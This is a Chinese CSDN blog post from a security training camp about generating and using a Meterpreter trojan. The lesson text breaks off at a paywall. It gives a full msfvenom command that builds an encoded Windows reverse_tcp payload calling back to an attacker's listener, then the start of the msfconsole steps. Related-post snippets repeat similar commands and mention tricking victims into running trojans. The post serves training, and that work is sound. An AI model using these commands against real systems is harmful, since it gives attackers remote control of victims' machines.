蓝盾实训营day7——meterpreter木马生成和利用

最新推荐文章于 2023-03-01 17:31:47 发布
最新推荐文章于 2023-03-01 17:31:47 发布
阅读量1.1k 收藏 7
点赞数 2
分类专栏: 网络安全 蓝盾十天网络攻防实训营记录 文章标签: meterpreter kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mingC0758/article/details/81076155
版权

meterpreter木马生成和利用

木马生成

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe

lhost 本地ip
lport 本地端口

命令完成后,会在当前目录下生成一个shell.exe可执行文件。

木马利用

获取Shell

先打开数据库服务:
service postgresql start

进入msf控制台:
msfconsole<

最低0.47元/天 解锁文章
mingC0758
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
蓝盾实训day6——日志查看和木马清除
mingC0758的博客
07-16 949
开启服务器日志和木马清除 开启服务器日志和木马清除 根据应用服务器的不同,有不同的日志开启方法,具体方法直接百度就行,比较简单。开启日志之后,用web扫描工具对网站进行扫描,利用文件上传漏洞进行挂马,然后我们可以查看日志,如果发现有未知页面被客户端访问,则可能发生了挂马行为,查找服务器有没有该木马文件,有就删掉。 apache-php开启日志方法 打开文件: Apa...
Metasploit 生成木马
2201_75516783的博客
11-28 771
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的 msfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
蓝盾实训day9——Windows主机安全加固和Android木马生成
mingC0758的博客
07-19 466
Windows主机安全加固 禁用guest账户 设置账户锁定策略 设置Administrator不允许终端登陆 使用注册表更改远程桌面监听的端口 用netstat -an 查看端口打开情况,关闭不必要的端口 关闭自动播放,防止U盘插入后病毒自动运行 7. ...
生成木马反弹和简单的Windows提权
BRMTSW的博客
03-01 641
生成木马反弹和简单的Windows提权
浅析木马服务端的生成技术
马说@CSDN
06-07 2750
  有些木马在解压缩之后只会有一个客户端程序,用户可以通过在客户端的一些设置工作来自动生成针对性比较强的服务端程序,例如特定的端口、击键木马的邮件地址、密码、SMTP服务器等等。在本文中,我将简要地探讨这一技术的实现。  事实上,这一技术并无神秘性可言,因为说穿了这一技术不过是对可执行文件的自定义资源进行操作罢了。也就是说,客户端程序本身绑有一段自定义的二进制数据,这段二进制数据实质上就是一个服务
蓝盾防火墙命令手册——很有用的
08-18
蓝盾防火墙的操作命令手册,希望对各位有用!
蓝盾杯攻防大赛的参考资料.7z
01-15
不错的资源哦!
蓝盾防火墙操作 手册(V1.8)v1.rar
02-15
蓝盾防火墙是新一代高速状态检测的包过滤防火墙,采用专用网络处理器 集成安全系统架构,全面提升报文过滤检测、攻击检测、NAT特性的性能;同时 可实现安全业务的全方面拓展,其灵活的模块化结构综合报文过滤、...
Python-蓝盾bkci是一个开源的持续集成和持续交付系统
08-10
7. **易用性**:蓝盾bk-ci设计的目的是使研发流程可视化,因此它很可能提供了直观的用户界面,方便团队成员监控构建状态、查看测试报告以及管理部署流程。 8. **集成能力**:作为一个CI/CD系统,蓝盾bk-ci可能支持...
蓝盾防火墙设备配置指导
12-17
介绍蓝盾防火墙的设备配置管理内容,分为8个部分介绍防火墙技术在蓝盾设备上的实现,是网络安全课程的重要资料之一,特别是配置有蓝盾公司设备的单位,用于单位培训或个人学习,都是较好的操作指导手册。
蓝盾(bk-ci)是一个开源的持续集成和持续交付系统-python
06-18
蓝盾(bk-ci)是一个基于Python开发的开源持续集成与持续交付系统,旨在简化和自动化软件的构建、测试和部署过程。在IT行业中,持续集成(Continuous Integration, CI)和持续交付(Continuous Delivery, CD)是现代...
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 8792
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
热门推荐
zhang35的博客
04-20 1万+
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
使用Metasploit生成木马控制Windows系统
weixin_56956399的博客
04-12 2206
使用Metasploit生成木马控制Windows系统
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3843
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
利用meterpreter生成一个简单的android木马
风中尘埃的博客
05-30 3255
这个学习过程我是在kali linux下进行的,成功的感染了自己的手机,当然了apk包没改签名也没有加小图标,所以只能当是一个实验吧。 首先使用这个命令: 使用这个命令,可以生成一个apk包,但是我在这里标明一下,LHOST的IP写自己网络的IP,LPORT写一个没有被使用的端口,apk包名自己可以随意取。 接下来打开meterpreter软件: 加载模块: 之后设置宿主机的IP和...
Exp2 后门原理与实践
weixin_30838921的博客
03-25 486
Exp2 后门原理与实践 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windows 7 sp1(64位) (IP: 10.0.2.7/24) nc/ncat的使用 nc(全称是netcat)是一个用于TCP/UDP连接和监听的linux工具,有着网络工具中的“瑞士军刀”的...
蓝盾实训day2——使用Kali ettercap进行DNS欺骗
mingC0758的博客
07-10 1403
蓝盾实训2 XSS可以直接百度,比较简单;arp欺骗和dns欺骗是用kali linux下的ettercap实现的,可以百度一下这个工具的使用。由于在上课的时候用的是有道云笔记写的..图片上传比较麻烦,所以这篇博文没有示例图片。之后的博文我尽量在csdn上编辑,就可以上传一些操作过程的图片了。 arp欺骗 原理 ARP协议的功能是通过目标设备的IP地址,查询目标设备的MAC地址。 每...
如何批量管理蓝盾硬盘还原
最新发布
05-11
如果您需要批量管理蓝盾硬盘还原,可以使用以下步骤: 1. 打开蓝盾硬盘还原软件,并选择“批量操作”选项。 2. 添加要还原的硬盘列表,并设置还原选项,如还原目标、还原方式等。 3. 点击“开始还原”按钮,等待硬盘还原完成。 在批量管理蓝盾硬盘还原时,需要注意以下事项: 1. 确认要还原的硬盘是否与蓝盾硬盘还原软件兼容。 2. 确认还原选项是否正确,以避免数据丢失或其他问题。 3. 确认硬盘还原完成后,进行测试以确保还原成功。 如果您对批量管理蓝盾硬盘还原不熟悉,建议先进行单个硬盘的还原测试,以确保操作正确无误。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值